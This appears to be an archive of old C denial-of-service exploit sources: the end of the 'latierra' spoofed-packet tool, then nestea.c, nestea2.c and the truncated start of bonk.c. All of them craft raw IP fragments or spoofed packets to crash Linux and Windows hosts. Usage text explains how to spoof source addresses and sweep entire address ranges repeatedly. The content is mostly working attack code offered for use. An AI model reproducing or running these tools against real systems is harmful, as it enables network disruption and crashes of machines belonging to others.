loop = loop_val; /* restore original value */
}
octet = 1; /* reset */
}
sprintf(temp_addr, "%s%d", class_c_addr, octet);
strcpy(ld.dest_ip, temp_addr);
if(!ld.supress_output)
printf("** incrementing to next IP address: %s\n", ld.dest_ip);
if(scan_loop > loop_val)
break; /* break while loop */
}
else if(use_file)
{
if(!get_ip(use_file, fp, buff))
break;
loop++;
strcpy(ld.dest_ip, buff);
}
} /* end while */
printf("\nDone.\n\n");
} /* end main */
int get_ip(int use_file, FILE *fp, char *buff)
{
if(use_file == LIST_FILE)
return(get_ip_from_list(fp, buff));
return(get_ip_from_zone(fp, buff));
}
int get_ip_from_list(FILE *fp, char *buff)
{
int ret_val;
while(1)
{
ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
if((ret_val == EOF) || (ret_val == (int)NULL))
return 0;
if( strlen(buff) >= 7)
if((buff[0] != ';') && (buff[0] != '['))
{
if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
buff[strlen(buff)-1] = 0x0;
return 1;
}
}
return 0;
}
int get_ip_from_zone(FILE *fp, char *buff)
{
int ret_val, i;
char *p, delim[8];
strcpy(delim, " \t");
while(1)
{
ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
if((ret_val == EOF) || (ret_val == (int)NULL))
return 0;
if( strlen(buff) >= 7)
if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
{
if( (p = strtok( buff, delim)) == NULL)
continue;
if( (p = strtok(NULL, delim)) == NULL)
continue;
if(strcmp(p, "A")) /* be sure second column is an DNS A record */
continue;
if( (p = strtok(NULL, delim)) == NULL)
continue;
strcpy(buff, p);
/* verify that we have a valid IP address to work with */
if(inet_addr(p) == -1)
continue;
/* strip off training line characters */
if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
buff[strlen(buff)-1] = 0x0;
return 1;
}
}
return 0;
}
/************/
/* checksum */
/************/
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i = 0; i< (length >> 1); i++)
value += data[i];
if((length & 1)==1)
value += (data[i] << 8);
value = (value & 0xFFFF) + (value >> 16);
return(~value);
}
/********/
/* land */
/********/
int land(LATIERRA_DATA *ld, int port_number)
{
struct sockaddr_in sin;
int sock;
char buffer[40];
struct iphdr * ipheader = (struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
{
printf("ERROR: unknown host %s\n", ld->dest_ip);
return(-1);
}
if((sin.sin_port=htons(port_number))==0)
{
printf("ERROR: unknown port %s\n",port_number);
return(-2);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
printf("ERROR: couldn't allocate raw socket\n");
return(-3);
}
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(ld->sequence_number);
ipheader->ttl = ld->ttl;
ipheader->protocol = ld->ip_protocol;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;
tcpheader->th_sport = sin.sin_port;
tcpheader->th_dport = sin.sin_port;
tcpheader->th_seq = htonl(ld->sequence_number);
tcpheader->th_flags = ld->tcp_flags;
tcpheader->th_off = sizeof(struct tcphdr)/4;
tcpheader->th_win = htons(ld->window_size);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol = ld->ip_protocol;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if( sendto(sock, buffer,
sizeof(struct iphdr)+sizeof(struct tcphdr),
ld->message_type,
(struct sockaddr *) &sin,
sizeof(struct sockaddr_in) )==-1)
{
printf("ERROR: can't send packet. (sendto failed)\n");
return(-4);
}
if(!ld->supress_output)
printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);
close(sock);
return(0);
}
/* End of land */
void alternatives()
{
printf("\nAlternative command line arguments for option -i\n\n");
printf(" You can create two types of files that latierra can use to get\n");
printf(" a list of IP addresses, a simple ASCII file with each IP address\n");
printf(" appearing on each line or better yet, a DNS zone file created by\n");
printf(" nslookup. If you are unfamiliar with nslookup, specify a '-n' on the\n");
printf(" command line of latierra.\n\n");
printf(" Basically, latierra will walk down the list and send the spoofed packet\n");
printf(" to each IP address. Once the list is complete, and loop > 1, the list\n");
printf(" is repeated. To specify that the '-i' option should use a zone file,\n");
printf(" specify \"zone=filename.txt\" instead of an IP address. To specify a \n");
printf(" simple ASCII list of IP addresses, use \"list=filename.txt\". Lines\n");
printf(" beginning with ';' or '[' are ignored. Lines that are not an 'A' \n");
printf(" record (second column)in a zone file will ignored.\n\n");
exit(-1);
}
void nslookup_help()
{
printf("\nNSLOOKUP help\n\n");
printf("To see who is the DNS server for a particular domain, issue the following:\n");
printf(" > set type=ns\n");
printf(" > xyz.com\n\n");
printf(" You will see a list of the name server(s) if completed successfully\n\n");
printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
printf("and issue the following commands:\n");
printf(" > server 1.1.1.1\n");
printf(" > ls -d xyz.com > filename.txt\n\n");
printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n");
exit(-1);
}
void protocol_list()
{
printf("\nProtocol List:\n\n");
printf("Verified:\n");
printf("1-ICMP 2-IGMP 3-GGP 5-ST 6-TCP 7-UCL 8-EGP 9-IGP 10-BBN_RCC_MON\n");
printf("11-NVP11 13-ARGUS 14-EMCON 15-XNET 16-CHAOS 17-UDP 18-MUX\n");
printf("19-DCN_MEAS 20-HMP 21-PRM 22-XNS_IDP 23-TRUNK1 24-TRUNK2\n");
printf("25-LEAF1 26-LEAF2 27-RDP 28-IRTP 29-ISO_TP4 30-NETBLT\n");
printf("31-MFE_NSP 32-MERIT_INP 33-SEP 34-3PC 62-CFTP 64-SAT_EXPAK\n");
printf("66-RVD 67-IPPC 69-SAT_MON 70-VISA 71-IPCV\n");
printf("76-BR_SAT_MON 77-SUN_ND 78-WB_MON 79-WB_EXPAK 80-ISO_IP\n");
printf("81-VMTP 82-SECURE_VMTP 83-VINES 84-TTP 85-NSFNET_IGP 86-DGP\n");
printf("87-TCF 88-IGRP 89-OSPFIGP 90-SPRITE_RPG 91-LARP\n\n");
printf("Supported:\n");
printf(" 6-TCP 17-UDP (future: PPTP, SKIP) \n\n");
exit(-1);
}
void print_arguments()
{
printf("Arguments: \n");
printf(" * -i dest_ip = destination ip address such as 1.1.1.1\n");
printf(" If last octet is '-', then the address will increment\n");
printf(" from 1 to 254 (Class C) on the next loop\n");
printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER);
printf(" Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
printf(" For list of alternative options, use -a instead of -h.\n");
printf(" * -b port# = beginning port number (required).\n");
printf(" -e port# = ending port number (optional)\n");
printf(" -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
printf(" -v = time_to_live value, default=%d\n", DEFAULT_TTL);
printf(" -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
printf(" -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
printf(" -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
printf(" -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
printf(" -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
printf(" -o 1 = supress additional output to screen, default=0\n" );
printf(" -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
printf(" * = required ~ = default parameter values\n\n");
exit(-1);
}
----- cut ----- cut -----
----- nestea.c ----- cut ----- cut -----
// nestea.c by humble of rhino9 4/16/98
// This exploits the "off by one ip header" bug in the linux ip frag code.
// Crashes linux 2.0.* and 2.1.* and some windows boxes
// this code is a total rip of teardrop - it's messy
// hi sygma
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
// bsd usage is currently broken because of socket options on the third sendto
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define MAGIC2 108
#define PADDING 256 /* datagram frame padding for first packet */
#define COUNT 500 /* we are overwriting a small number of bytes we
shouldnt have access to in the kernel.
to be safe, we should hit them till they die :> */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
fprintf(stderr, "Death on flaxen wings (yet again):\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
int i;
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
byte = 0x4F; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 44;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
for(i=0;i<PADDING;i++)
{
p_ptr[i++]=random()%255;
}
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}
----- cut ----- cut -----
----- nestea2.c ----- cut ----- cut -----
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define MAGIC2 108
#define PADDING 256 /* datagram frame padding for first packet */
#define COUNT 500 /* we are overwriting a small number of bytes we
shouldnt have access to in the kernel.
to be safe, we should hit them till they die :> */
struct ipstuph
{
int p1;
int p2;
int p3;
int p4;
} startip, endip;
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock, j, bequiet = 0;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
char hit_ip[18], dst_ip2[18];
struct in_addr addr;
fprintf(stderr, "\n[1;34mNestea v2 [0;34moriginally by[0m: [1;34mhumble [0;34m+ [1;34mttol mods[0m\n");
fprintf(stderr, "[0;34mColor and Instructions was done by [0m: [1;34mttol[0m\n");
fprintf(stderr, "[1;34mNote[0m : [1;34mttol released Nestea v2. humble had nothing to do with \n it, don't nag him about it. -ttol@ttol.net[0m\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("[1;34mraw socket[0m");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 4) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "[1;34mWhat the hell kind of IP address is that?[0m\n");
exit(1);
}
strcpy(dst_ip2,argv[3]);
if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3,
&startip.p4) != 4)
{
fprintf(stderr, "[1;34mError, arg2(startip) [0m: [0;34mNeed an ip that contains 4 zones[0m\n");
exit(1);
}
if (startip.p1 > 255) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of start ip is incorrect \
(greater than 255)[0m\n");
exit(1);
}
if (startip.p2 > 255) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of start ip is incorrect \
(greater than 255)[0m\n");
exit(1);
}
if (startip.p3 > 255) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of start ip is incorrect \
(greater than 255)[0m\n");
exit(1);
}
if (startip.p4 > 255) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 4 of start ip is incorret \
(greater than 255)[0m\n");
exit(1);
}
if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3,
&endip.p4) != 4)
{
fprintf(stderr, "[1;34mError, arg3(endip) [0m: [[0;34mNeed an ip that \
contains 4 zones[[0m\n");
exit(1);
}
if (endip.p1 > 255) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of end ip is incorrect \
(greater than 255)[0m\n");
exit(1);
}
if (endip.p2 > 255) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of end ip is incorrect \
(greater than 255)[0m\n");
exit(1);
}
if (endip.p3 > 255) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of end ip is incorrect
(greater than 255)[0m\n");
exit(1);
}
if (endip.p4 > 255) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 4 of end ip is incorrect
(greater than 255)[0m\n");
exit(1);
}
if (startip.p1 != endip.p1) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of start ip and end ip is different[0m\n");
exit(1);
}
if (startip.p2 != endip.p2) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of start ip and end ip is different[0m\n");
exit(1);
}
if (startip.p3 != endip.p3) {
fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of start ip and end ip is different[0m\n");
exit(1);
}
while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
case 'q': /* quiet mode */
bequiet = 1;
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "[1;34mDeath [0;34mon flaxen wings ([1;34myet again[0;34m)[0m:\n");
addr.s_addr = src_ip;
fprintf(stderr, "[1;34mFrom[0m: [0;34m%15s.%d[0m\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " [1;34mTo[0m: [0;34m%15s - %s.%d[0m\n", inet_ntoa(addr),
dst_ip2, dst_prt);
fprintf(stderr, " [1;34mAmt[0m: [0;34m%5d[0m\n", count);
if (bequiet) fprintf(stderr, "[0;34m[[1;34mquiet mode[0;34m] [0;34mEach'[1;34m.[0;34m' represents a nuked ip. [0;34m[[0m");
for (j=startip.p4; j <= endip.p4; j++)
{
sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);
if (!(bequiet)) fprintf(stderr, "[0;34m%s [1;34m[ [0m", hit_ip);
if (!(dst_ip = name_resolve(hit_ip)))
{
fprintf(stderr, "[0;34mWhat the [1;34mhell [0;34mkind of IP address is that?[0m\n");
exit(1);
}
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
if (!(bequiet)) fprintf(stderr, "[0;34md[1;34m00[0;34mm [0m");
usleep(500);
}
if (bequiet) fprintf(stderr, "[1;34m.[0m");
else fprintf(stderr, "[0;34m][0m\n");
}
if (bequiet) fprintf(stderr, "[0;34m][0m\n");
return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
int i;
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
byte = 0x4F; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 44;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
for(i=0;i<PADDING;i++)
{
p_ptr[i++]=random()%255;
}
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"[1;34mnestea2 [0;34msource startIP endIP [1;34m[[0;34m-s src port[1;34m] [[0;34m-t dest port[1;34m] [[0;34m-n quantity[1;34m] [[0;34m-q[1;34m][0m\n");
fprintf(stderr, "[0;34msource [0m: [1;34mThis is the source IP to nestea from, make it a spoof[0m\n");
fprintf(stderr, "[0;34mstartIP [0m: [1;34mFrom which IP should we start from? [1;34m([0;34meg 153.35.85.1[1;34m)[0m\n");
fprintf(stderr, "[0;34mendIP [0m: [1;34mFrom which IP should we end with? [1;34m([0;34meg 153.35.95.255[1;34m)[0m\n");
fprintf(stderr, "[0;34msrc port [0m: [1;34mThis is the source port to spoof from [1;34m([0;34mOPTIONAL[1;34m)[0m\n");
fprintf(stderr, "[0;34mdest port[0m: [1;34mThis is the destination port to nestea to [1;34m([0;34mOPTIONAL[1;34m)[0m\n");
fprintf(stderr, "[0;34mquantity [0m: [1;34mThis is how many times to nestea the victim [1;34m([0;34mperfered is 1000[1;34m)[0m\n");
fprintf(stderr, "[0;34m-q [0m: [1;34mThis is quiet mode so you don't see the [0;34md[1;34m00[0;34mm[1;34m's[0m\n\n");
fprintf(stderr, "[0;34mExample [0m: [1;34mnestea2 127.0.0.1 153.35.85.1 153.35.85.255 -n 1000[0m\n");
fprintf(stderr, "[0;34mThe above was to hit a whole Class C of 153.35.85 with the return \naddress from 127.0.0.1 doing it 1000 times[0m\n");
fprintf(stderr, "[0;34mExample2 [0m: [1;34mnestea2 153.35.85.32 153.35.85.32 153.85.35.32 -n 1000[0m\n");
fprintf(stderr, "[0;34mThe above was to hit 153.35.85.32 with the source 153.35.85.32 \ndoing it 1000 times[0m\n");
fprintf(stderr, "[1;34mI perfer example2, probably because it is the lazy man's way out[0m\n\n");
fprintf(stderr, " [1;5;34mNOT TO BE DISTRIBUTED![0m\n");
exit(0);
}
----- cut ----- cut -----
----- bonk.c ----- cut ----- cut -----
/*
[ http://www.rootshell.com/ ]
==bendi - 1998==
bonk.c - 5/01/1998
Based On: teardrop.c by route|daemon9 & klepto
Crashes *patched* win95/(NT?) machines.
Basically, we set the frag offset > header length (teardrop
reversed). There are many theories as to why this works,
however i do not have the resources to perform extensive testing.
I make no warranties. Use this code at your own risk.
Rip it if you like, i've had my fun.
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>
#define FRG_CONST 0x3
#define PADDING 0x1c
struct udp_pkt
{
struct iphdr ip;
struct udphdr udp;
char data[PADDING];
} pkt;
int udplen=sizeof(struct udphdr),
iplen=sizeof(struct iphdr),
datalen=100,
psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
spf_sck; /* Socket */
void usage(void)
{
fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");
exit(0);
}
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
